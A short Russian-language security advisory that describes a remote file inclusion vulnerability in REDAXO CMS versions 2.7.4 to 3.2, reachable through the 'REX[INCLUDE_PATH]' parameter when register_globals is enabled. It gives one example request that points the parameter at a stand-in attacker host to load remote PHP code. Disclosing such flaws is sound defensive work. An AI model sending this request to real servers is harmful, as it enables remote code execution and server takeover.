Программа: REDAXO 2.7.4, 3.0, 3.1, 3.2, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "REX[INCLUDE_PATH]" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

./redaxo/include/addons/image_resize/pages/index.inc.php? REX[INCLUDE_PATH]=attacker
 



Оставить мнение